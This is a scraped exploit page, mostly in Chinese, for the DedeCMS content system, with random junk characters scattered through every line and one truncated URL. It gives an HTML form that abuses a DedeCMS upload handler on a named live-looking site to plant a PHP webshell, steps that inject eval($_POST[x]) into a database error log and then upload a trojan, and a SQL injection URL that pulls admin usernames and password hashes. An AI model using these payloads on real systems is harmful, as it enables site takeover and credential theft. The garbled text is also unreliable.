: Z# u8 c: ], g; n9 O; K3 a<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>0 e% g7 o7 m* b* d2 ?. K2 B
</head>8 v# j6 l: G+ n5 v
<body style="FONT-SIZE: 9pt">
+ F' q. G$ x5 @0 D% I---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
( u& l0 u- k( E5 i2 _+ ^0 p: r<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
, N% {0 Z# d* Y, S2 ^- w<input type='hidden' name='activepath' value='/data/cache/' />
3 t3 V* p/ F! M& u, |6 `0 T<input type='hidden' name='cfg_basedir' value='../../' />
! N* l# z% g! ^- c<input type='hidden' name='cfg_imgtype' value='php' />
5 C4 C7 F V J, S* S; g* A<input type='hidden' name='cfg_not_allowall' value='txt' />
, w; @( k: T4 k<input type='hidden' name='cfg_softtype' value='php' /> K, m6 I% f$ y" U6 D. |4 H
<input type='hidden' name='cfg_mediatype' value='php' />1 _% b% N2 {: f. f
<input type='hidden' name='f' value='form1.enclosure' />4 u6 K: x9 m {; t& U1 P) p
<input type='hidden' name='job' value='upload' />
0 e. [: w; V4 o3 H8 i ^<input type='hidden' name='newname' value='fly.php' />
% l$ M6 `1 X+ r% \1 s% O5 CSelect U Shell <input type='file' name='uploadfile' size='25' />
# |2 _- U* f- g5 {) w# M0 N, x<input type='submit' name='sb1' value='确定' />; _% t, B" J) \ x5 b, _/ i
</form>" _% I8 l3 o3 N9 ~' k
<br />It's just a exp for the bug of Dedecms V55...<br />
9 w5 E6 m2 p. @& t2 MNeed register_globals = on...<br />, s& _; A' Q6 T$ p; o% X8 z3 A
Fun the game,get a webshell at /data/cache/fly.php...<br /># o; e6 }5 w! Z" ?9 `
</body>
; J$ F6 ~9 W- b# ~: V* q) ^; W</html>
9 I; q% i- |& \2 e- o- g
, x0 ^5 c3 _% G( B; V; p: l; W6 `# @( `% K
/ w* f2 u/ Z d, d1 i. e; w2 d
; i5 @9 m: P! W6 A; Y* x" @' z$ U# L( N( @" t
5 ]; D S# ?4 p, _5 z; ?6 \
% H" M. x+ l3 g1 } V4 {: t; X; Y5 t( k) _8 i
9 C' ?& Q& d2 O$ w9 l
, m4 ^8 Y9 A8 I) }
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞; w3 c: W4 _2 b3 n
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。$ X$ U- q* r, I# s7 p3 b( `7 o6 E
1. 访问网址:
2 R$ I" H7 Q m* Khttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
1 B {6 ~; K+ `8 ^! j# P, `可看见错误信息" X; |/ U/ k, n
B1 i3 W4 {6 K, g
- F$ u& g0 Q& t$ e% o |2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
/ \ ]7 @5 N! Z: n5 Jint(3) Error: Illegal double '1024e1024' value found during parsing1 @0 t/ v% a' E% |: F: s3 w
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>: P/ B$ C% B9 R0 _, t9 N
" ` H8 [6 r% j: z1 g
* Z. S8 C+ z# R8 v3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
( y* n6 u8 z2 g/ s) |
- X4 ? f" ~1 e+ t# K4 N; W0 Y4 G% E3 M, w8 L s( Z' @9 K
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
; B# B8 m3 y! w- H2 w! q" ~7 `& Z
/ L/ o j6 N% e( K$ o( F: s3 [4 V! e
按确定后的看到第2步骤的信息表示文件木马上传成功.1 O" g* ^% q% O) V: t$ t4 Y
0 T1 @7 P& ?0 y$ v4 C
0 x' y1 G4 z# Z. S) J! B5 e" `! K* o, V+ k7 B
l' i& [, _3 T8 O2 s
/ Q0 `! B& S% \& k; c1 \* Y( t6 _& K2 m4 n
) ], C. c, D8 I
4 ^$ T8 P% o; k
. r$ p" w& U9 F) S! H
. J8 M# k- J& p0 y! c& a# l1 r3 b! @1 n
/ T e6 Y5 z1 f6 Z织梦(DedeCms)plus/infosearch.php 文件注入漏洞) l$ U* q" S$ h, D
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|